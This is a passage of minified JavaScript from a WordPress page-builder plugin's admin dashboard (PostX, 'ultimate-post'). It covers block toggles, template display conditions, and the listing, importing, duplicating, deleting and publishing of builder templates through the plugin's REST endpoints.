Rating","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8858",icon:"star-rating.svg"},accordion:{label:__("Accordion","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8851",docs:"https://wpxpo.com/docs/postx/all-blocks/accordion-block/",icon:"accordion.svg"},tabs:{label:__("Tabs","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9045",docs:"https://wpxpo.com/docs/postx/all-blocks/tabs-block/",icon:"tabs.svg"},gallery:{label:__("PostX Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8951",docs:"https://wpxpo.com/docs/postx/all-blocks/postx-gallery-block/",icon:"gallery.svg"},youtube_gallery:{label:__("Youtube Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9096",docs:"https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/",icon:"youtube-gallery.svg"}}},builder:{label:__("Site Builder Blocks","ultimate-post"),attr:{builder_post_title:{label:__("Post Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_title.svg"},builder_advance_post_meta:{label:__("Advance Post Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_meta.svg"},builder_archive_title:{label:__("Archive Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"archive-title.svg"},builder_author_box:{label:__("Post Author Box","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author_box.svg"},builder_post_next_previous:{label:__("Post Next Previous","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/next_previous.svg"},builder_post_author_meta:{label:__("Post Author Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author.svg"},builder_post_breadcrumb:{label:__("Post Breadcrumb","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/breadcrumb.svg"},builder_post_category:{label:__("Post Category","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/category.svg"},builder_post_comment_count:{label:__("Post Comment Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comment_count.svg"},builder_post_comments:{label:__("Post Comments","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comments.svg"},builder_post_content:{label:__("Post Content","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/content.svg"},builder_post_date_meta:{label:__("Post Date Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_date.svg"},builder_post_excerpt:{label:__("Post Excerpt","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/excerpt.svg"},builder_post_featured_image:{label:__("Post Featured Image/Video","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/featured_img.svg"},builder_post_reading_time:{label:__("Post Reading Time","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/reading_time.svg"},builder_post_social_share:{label:__("Post Social Share","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/share.svg"},builder_post_tag:{label:__("Post Tag","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_tag.svg"},builder_post_view_count:{label:__("Post View Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/view_count.svg"}}}},s=()=>{const[e,t]=(0,a.useState)({}),[n,s]=(0,a.useState)({state:!1,status:""}),[p,c]=(0,a.useState)(!1),d=(0,r.t)();(0,a.useEffect)((()=>{u()}),[]);const u=()=>{c(!0),wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&d.current&&(t(e.settings),c(!1))}))};return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-container"},n.state&&(0,a.createElement)(i.Z,{delay:2e3,toastMessages:n,setToastMessages:s}),Object.keys(l).map(((n,r)=>{const i=l[n];return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-group",key:r},p?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:180,unit1:"px",size2:32,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Array(3).fill(1).map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:t},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:25,unit2:"px",br:4}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:100,unit1:"px",size2:20,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:46,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:36,unit1:"px",size2:20,unit2:"px",br:8}}))))))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_h5"},i.label),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Object.keys(i.attr).map(((n,r)=>{const o=i.attr[n];let l=!!o.default;return""==e[n]&&(l="yes"==e[n]),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:r},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/blocks/${o.icon}`,alt:o.label}),(0,a.createElement)("div",null,o.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},o.docs&&(0,a.createElement)("a",{href:o.docs+"?utm_source=db-postx-blocks&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-media-document"}),__("Docs","ultimate-post")),o.live&&(0,a.createElement)("a",{href:o.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-external"}),__("Live","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:n,checked:l,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&s({status:"success",messages:[e.message],state:!0})}))})(n)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:n})))})))))})))}},4872:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(1078),o=n(6765);const{__}=wp.i18n,i=e=>{const{id:t,type:n,settings:i,defaults:l,setShowCondition:s}=e,[p,c]=(0,a.useState)(t&&void 0!==i[n]&&void 0!==i[n][t]?i[n][t]:["include/"+n]),[d,u]=(0,a.useState)({reload:!1,dataSaved:!1});return(0,a.createElement)("div",{className:"ultp-modal-content"},(0,a.createElement)("div",{className:"ultp-condition-wrap"},(0,a.createElement)("div",{className:"ultp_h3"},__("Where Do You Want to Display Your Template?","ultimate-post")),(0,a.createElement)("p",{className:"ultp-description"},__("Set the conditions that determine where your Template is used throughout your site.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-condition-items"},p.map(((e,i)=>{if(e)return(0,a.createElement)("div",{key:i,className:"ultp-condition-wrap__field"},"header"==n||"footer"==n?(0,a.createElement)(r.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}):(0,a.createElement)(o.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}),(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-condition_cancel",onClick:()=>{u({dataSaved:!1});let e=JSON.parse(JSON.stringify(p));e.splice(i,1),c(e)}}))}))),(0,a.createElement)("button",{className:"btnCondition cursor",onClick:()=>{const e="singular"==n?"include/singular/post":"header"==n||"footer"==n?"include/"+n+"/entire_site":"include/"+n;c([...p,e])}},__("Add Conditions","ultimate-post"))),(0,a.createElement)("button",{className:"ultp-save-condition cursor",onClick:()=>{u({reload:!0});let e=Object.assign({},i);void 0!==e[n]||(e[n]={}),e[n][t]=p.filter((e=>e)),wp.apiFetch({path:"/ultp/v2/condition_save",method:"POST",data:{settings:e}}).then((e=>{e.success&&(u({reload:!1,dataSaved:!0}),setTimeout((function(){u({reload:!1,dataSaved:!1}),s&&s("")}),2e3))}))}},d.dataSaved?"Condition Saved.":"Save Condition",(0,a.createElement)("span",{style:{visibility:d.reload?"visible":"hidden"},className:"dashicons dashicons-update rotate ultp-builder-import"})))}},1078:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[4]?x(s[4],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[3];return t&&o[s[2]]&&o[s[2]].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s.splice(0,1,e.target.value),i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"entire_site",onChange:e=>{s.splice(2,1,e.target.value||"entire_site"),s.splice(3),"singular"==e.target.value&&s.push("post"),i(s.join("/"),l)}},o[r].map(((e,t)=>(0,a.createElement)("option",{key:t,value:e.value},e.label)))),s[2]&&"entire_site"!=s[2]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("select",{value:s[3]||"",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s.splice(3,1,e.target.value),s.splice(e.target.value?4:3);const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[s[2]]&&o[s[2]].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>!e.attr&&(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[4])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s.splice(4,1,"");const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s.splice(4,1,e.value),i(s.join("/"),l)}},e.title))))))))}},6765:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[3]?x(s[3],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[2];return t&&o[r]&&o[r].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s[0]=e.target.value,i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"post",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s[2]=e.target.value;const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[r]&&o[r].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[3])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s[3]="";const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s[3]=e.value,i(s.join("/"),l)}},e.title)))))))}},8351:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7462),r=n(7294),o=n(1383),i=n(4766),l=n(356),s=n(4482),p=n(8949),c=n(4872);n(3493);const{__}=wp.i18n,d=e=>{const t=e.has_ultp_condition?ultp_condition:ultp_dashboard_pannel,{notEditor:n}=e,d=["singular","archive","category","search","author","post_tag","date","header","footer","404"],[u,m]=(0,r.useState)(""),[f,h]=(0,r.useState)([]),[g,v]=(0,r.useState)("all"),[_,w]=(0,r.useState)(!1),[b,x]=(0,r.useState)([]),[y,k]=(0,r.useState)(n||""),[E,C]=(0,r.useState)([]),[S,M]=(0,r.useState)(!1),[L,N]=(0,r.useState)(""),[Z,P]=(0,r.useState)([]),[z,A]=(0,r.useState)(""),[B,H]=(0,r.useState)(!1),[T,R]=(0,r.useState)(!1),[O,j]=(0,r.useState)(!1),[V,F]=(0,r.useState)(""),[W,D]=(0,r.useState)(!1),I="yes"==n?wp.data.select("core/editor").getCurrentPostId():"",[U,$]=(0,r.useState)([]),[G,q]=(0,r.useState)(!1),[K,X]=(0,r.useState)({state:!1,status:""}),Q=(0,o.t)(),J=async()=>{await wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&e.data){const t=JSON.parse(e.data);Y(t)}}))},Y=e=>{const t=[],n=[];e.forEach((e=>{e.templates.forEach((a=>{const r={...a,parentID:e.ID};r.hasOwnProperty("home_page")&&"home_page"==r.home_page&&t.push(r),"ultp_builder"==r.type&&n.push(r)}))})),P(n),$(t)},ee=async()=>{await wp.apiFetch({path:"/ultp/v2/data_builder",method:"POST",data:{pid:I}}).then((e=>{e.success&&Q.current&&(h(e.postlist),x(e.settings),C(e.defaults),m(e.type),j(!0),J())}))};(0,r.useEffect)((()=>(ee(),document.addEventListener("mousedown",ne),()=>document.removeEventListener("mousedown",ne))),[]);const te=(e,t)=>{wp.apiFetch({path:"/ultp/v2/get_single_premade",method:"POST",data:{type:L,ID:e,apiEndPoint:t}}).then((e=>{e.success?(A(""),window.open(e?.link?.replaceAll("&amp;","&"))):(H(!0),A(""),R(!0))}))},ne=e=>{e.target&&!e.target.classList?.contains("ultp-reserve-button")&&(F(""),D(!1))},ae=(e,n)=>{const a=`https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.parentID}/postx_importer_img/pages/${e.name.toLowerCase().replaceAll(" ","_")}.jpg`,o="https://postxkit.wpxpo.com/"+(["header","footer","front_page"].includes(L)?e.live:e.live+"/postx_"+("archive"==e.builder_type?e.archive_type:e.builder_type));return(0,r.createElement)("div",{key:n,className:"ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"title"},(0,r.createElement)("span",null,e.name),(0,r.createElement)("div",{className:"parent"},e.parent)),e.pro&&!t.active?(0,r.createElement)("a",{className:"ultp-upgrade-pro-btn",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):e.pro&&T?(0,r.createElement)("a",{className:"ultp-btn-success",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Get License","ultimate-post")):(0,r.createElement)("span",{onClick:()=>{A(e.ID),te(e.ID,"https://postxkit.wpxpo.com/"+e.live)},className:"btnImport cursor"}," ",i.ZP.arrow_down_line,__("Import","ultimate-post"),z&&z==e.ID?(0,r.createElement)("span",{className:"dashicons dashicons-update rotate"}):"")),(0,r.createElement)("div",{className:"listOverlay bg-image-aspect",style:{backgroundImage:`url(${a})`}},(0,r.createElement)("div",{className:"ultp-list-dark-overlay"},(0,r.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",href:o,target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))))},re=()=>"all"!=g&&"archive"!=g?(N(g),v(g),void((Z.length<=0||"front_page"==g&&U.length<=0)&&J())):(0,r.createElement)("div",{className:"ultp-builder-items"},("all"==g?["front_page",...d]:"archive"==g?d.filter((e=>"singular"!=e)):[g]).map(((e,n)=>(0,r.createElement)("div",{key:n,onClick:()=>{N(e),v(e),(Z.length<=0||"front_page"==e&&U.length<=0)&&J()}},(0,r.createElement)("div",{className:"newScreen ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"ultp_h6"},e)),(0,r.createElement)("div",{className:"listOverlays"},(0,r.createElement)("img",{src:t.url+`addons/builder/assets/icons/template/${e.toLowerCase()}.svg`}),(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"}),__("Add","ultimate-post")," ",e)))))));return(0,r.createElement)("div",{className:"ultp-builder-dashboard"},K.state&&(0,r.createElement)(l.Z,{delay:2e3,toastMessages:K,setToastMessages:X}),!n&&(0,r.createElement)("div",{className:"ultp-builder-dashboard__content ultp-builder-tab"},(0,r.createElement)("div",{className:"ultp-builder-tab__option"},(0,r.createElement)("span",{onClick:()=>(M(!0),void wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(ee(),M(!1),X({status:"success",messages:[e.message],state:!0}))}))),className:"ultp-popup-sync"},(0,r.createElement)("i",{className:"dashicons dashicons-update-alt"+(S?" rotate":"")}),__("Synchronize","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"all"==g&&{className:"active"},{onClick:()=>{v("all"),w(!1),N("")}}),(0,r.createElement)("span",{className:"dashicons dashicons-admin-home"})," ",__("All Template","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"front_page"==g&&{className:"active"},{onClick:()=>{v("front_page"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/front_page.svg"}),__("Front Page","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"singular"==g&&{className:"active"},{onClick:()=>{v("singular"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/singular.svg"}),__("Singular","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"search"==g&&{className:"active"},{onClick:()=>{v("search"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/search.svg"}),__("Search Result","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"archive"==g&&{className:"active"},{onClick:()=>{v("archive"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/archive.svg"}),__("Archive","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"category"==g&&{className:"active"},{onClick:()=>{v("category"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/category.svg"}),__("Category","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"author"==g&&{className:"active"},{onClick:()=>{v("author"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/author.svg"}),__("Authors","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"post_tag"==g&&{className:"active"},{onClick:()=>{v("post_tag"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/tag.svg"}),__("Tags","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"date"==g&&{className:"active"},{onClick:()=>{v("date"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/date.svg"}),__("Date","ultimate-post"))),(0,r.createElement)("li",(0,a.Z)({},"header"==g&&{className:"active"},{onClick:()=>{v("header"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/header.svg"}),__("Header","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"footer"==g&&{className:"active"},{onClick:()=>{v("footer"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/footer.svg"}),__("Footer","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"404"==g&&{className:"active"},{onClick:()=>{v("404"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/404.svg"}),"404"))),(0,r.createElement)("div",{className:"ultp-builder-tab__content ultp-builder-tab__template"},(0,r.createElement)("div",{className:"ultp-builder-tab__heading"},(0,r.createElement)("div",{className:"ultp-builder-heading__title"},(""!=L||_)&&G&&(0,r.createElement)("span",{onClick:()=>{q(!1),w(!1),N("")}}," ",i.ZP.leftAngle2,__("Back","ultimate-post")),(0,r.createElement)("div",{className:"ultp_h5 heading"},__("All","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Templates","ultimate-post"))),f.length>0&&""==L&&!_?(0,r.createElement)("button",{className:"cursor ultp-primary-button ultp-builder-create-btn",onClick:()=>{w(!0),q(!0),N("all"==g||"archive"==g?"":g)}}," ","+ ",__("Create","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Template","ultimate-post")):O?"":(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:170,unit1:"px",size2:42,unit2:"px",br:4}})),(0,r.createElement)("div",{className:"ultp-tab__content active"},O?""==L?((e="all")=>{let t=0;return(0,r.createElement)("div",{className:"ultp-template-list__tab"},0==_&&f.length>0?f.map(((n,a)=>{const o=((e,t)=>{let n=[];return e?.id&&void 0!==b[e?.type]&&b[e.type][e.id]?.map(((e,t)=>{e&&(n=e.split("/"))})),n})(n);if("all"==e||e==n.type||e==o[2]&&n.type==o[1]&&!["header","footer"].includes(n.type))return t++,(0,r.createElement)("div",{key:a,className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)("div",{className:"ultp-template-list__meta"},(0,r.createElement)("div",null,(0,r.createElement)("span",null,"front_page"==n.type?"Front Page":n.type," ",":")," ",n.title," ",(0,r.createElement)("span",null,"ID :")," #",n.id),n.id&&void 0!==b[n.type]&&(0,r.createElement)("div",{className:"ultp-condition__previews"},"(",(b[n.type][n.id]||[]).map(((e,t)=>{if(e){const n=e.split("/");return(0,r.createElement)(r.Fragment,{key:t},0==t?"":", ",(0,r.createElement)("span",null,void 0!==n[2]?n[2]:n[1]))}})),")")),(0,r.createElement)("div",{className:"ultp-template-list__control ultp-template-list__content"},"front_page"!=n.type&&"404"!=n.type&&(0,r.createElement)("button",{onClick:()=>{m(n.type),k(n.id)},className:"ultp-condition__edit"},__("Conditions","ultimate-post")),(0,r.createElement)("a",{className:"status"}," ","publish"==n.status?"Published":n.status),(0,r.createElement)("a",{href:n?.edit?.replaceAll("&amp;","&"),className:"ultp-condition-action",target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"duplicate",section:"builder"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to delete this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"delete",section:"builder"}}).then((e=>{e.success&&(h(f.filter((e=>e.id!=n.id))),X({status:"error",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),(0,r.createElement)("span",{onClick:e=>{D(!W),F(n.id)}},(0,r.createElement)("span",{className:"dashicons dashicons-ellipsis ultp-builder-dashboard__action ultp-reserve-button"})),V==n.id&&W&&(0,r.createElement)("span",{className:"ultp-builder-action__active ultp-reserve-button",onClick:e=>{F(""),D(!1),e.preventDefault(),confirm(`Are you sure you want to ${"publish"==n.status?"draft":"publish"} this template?`)&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"status",status:"publish"==n.status?"draft":"publish"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-open-folder ultp-reserve-button"})," ",__("Set to","ultimate-post")," ","publish"==n.status?__("Draft","ultimate-post"):__("Publish","ultimate-post")))))})):re(),0==_&&f.length>0&&!t&&re())})(g):(0,r.createElement)("div",{className:`premadeScreen ${L&&" ultp-builder-items ultp"+L}`},(0,r.createElement)("div",{className:"ultp-list-blank-img ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"ultp-item-list-overlay ultp-p20 ultp-premade-img__blank"},(0,r.createElement)("img",{src:t.url+"assets/img/dashboard/start-scratch.svg"}),(0,r.createElement)("a",{className:"cursor",onClick:e=>{e.preventDefault(),te()}},(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"})," ",__("Start from Scratch","ultimate-post")," ")))),"front_page"==L?U.map(((e,t)=>ae(e,t))):Z.map(((e,t)=>{if("archive"!=e.builder_type&&e.builder_type==L||"archive"==e.builder_type&&(e.archive_type==L||"archive"==L))return ae(e,t)}))):(0,r.createElement)("div",{className:"skeletonOverflow",label:__("Loading…","ultimate-post")},Array(6).fill(1).map(((e,t)=>(0,r.createElement)("div",{key:t,className:"ultp-template-list__tab",style:{marginBottom:"15px"}},(0,r.createElement)("div",{className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"%",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-template-list__control 